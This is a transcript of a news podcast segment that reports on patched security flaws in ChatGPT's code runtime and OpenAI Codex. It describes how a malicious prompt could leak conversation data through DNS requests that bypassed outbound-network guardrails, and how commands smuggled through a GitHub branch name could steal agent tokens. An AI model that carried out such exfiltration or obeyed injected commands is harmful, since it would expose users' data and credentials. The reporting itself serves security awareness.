[00:00] Announcer: From Neural Newscast, this is Model Behavior, AI-focused news and analysis on the models shaping our world. [00:11] Nina Park: I'm Nina Park. [00:13] Nina Park: Welcome to Model Behavior, where we examine how AI systems are built, deployed, and operated [00:19] Nina Park: in professional environments. [00:21] Thatcher Collins: I'm Thatcher Collins. [00:22] Thatcher Collins: Today we're reviewing a series of security patches from OpenAI, addressing vulnerabilities [00:27] Thatcher Collins: that could have permitted covert data exfiltration and credential theft. [00:32] Nina Park: The Hacker News is reporting on research from Checkpoint regarding ChatGPT's Linux runtime [00:37] Nina Park: environment. [00:38] Nina Park: Thatcher, it appears a vulnerability allowed sensitive conversation data to be exfiltrated [00:44] Nina Park: through a hidden DNS-based side channel. [00:46] Thatcher Collins: That's correct, Nina. [00:48] Thatcher Collins: The fundamental issue is that the AI's code execution environment assumed a level of isolation [00:53] Thatcher Collins: that was not fully realized. [00:56] Thatcher Collins: By encoding data into DNS requests, a malicious prompt could bypass the standard guardrails [01:01] Thatcher Collins: designed to prevent outbound network traffic. [01:04] Nina Park: Checkpoint noted that this could leak messages or uploaded files without any user warning. [01:10] Nina Park: OpenAI patched the specific issue on February 20th, and notably, there's no evidence it was exploited in the wild. [01:18] Thatcher Collins: It raises questions about why the native security controls didn't flag the behavior. [01:23] Thatcher Collins: If the system doesn't recognize a DNS request as a potential data transfer, [01:28] Thatcher Collins: it won't trigger a confirmation dialogue, leaving a significant blind spot. [01:33] Nina Park: We also have news regarding OpenAI Codex. [01:37] Nina Park: Beyond Trust discovered a command injection vulnerability [01:40] Nina Park: where an attacker could smuggle commands [01:42] Nina Park: through a GitHub branch name parameter. [01:45] Thatcher Collins: Nina, this is particularly concerning for developers. [01:48] Thatcher Collins: That injection could lead to the theft [01:50] Thatcher Collins: of GitHub agent access tokens, [01:52] Thatcher Collins: potentially giving an attacker read and write access [01:55] Thatcher Collins: to a victim's entire code base. [01:57] Nina Park: OpenAI patched that Codex flaw earlier on February 5th, [02:02] Nina Park: These two cases together suggest that as AI agents gain more privileged access to enterprise systems, [02:08] Nina Park: the attack surface is expanding rapidly. [02:11] Thatcher Collins: Exactly. The takeaway here is that organizations shouldn't assume AI tools are secure by default. [02:18] Thatcher Collins: There needs to be a layered approach to security architecture that treats AI inputs [02:22] Thatcher Collins: with the same rigor as any other application boundary. [02:26] Nina Park: Thank you for listening to Model Behavior, a neural newscast editorial segment. [02:31] Nina Park: For more details on these findings, visit mb.neuralnewscast.com. [02:37] Nina Park: Neural Newscast is AI-assisted, human-reviewed. [02:42] Nina Park: View our AI transparency policy at neuralnewscast.com. [02:47] Announcer: This has been Model Behavior on Neural Newscast. [02:50] Announcer: Examining the systems behind the story.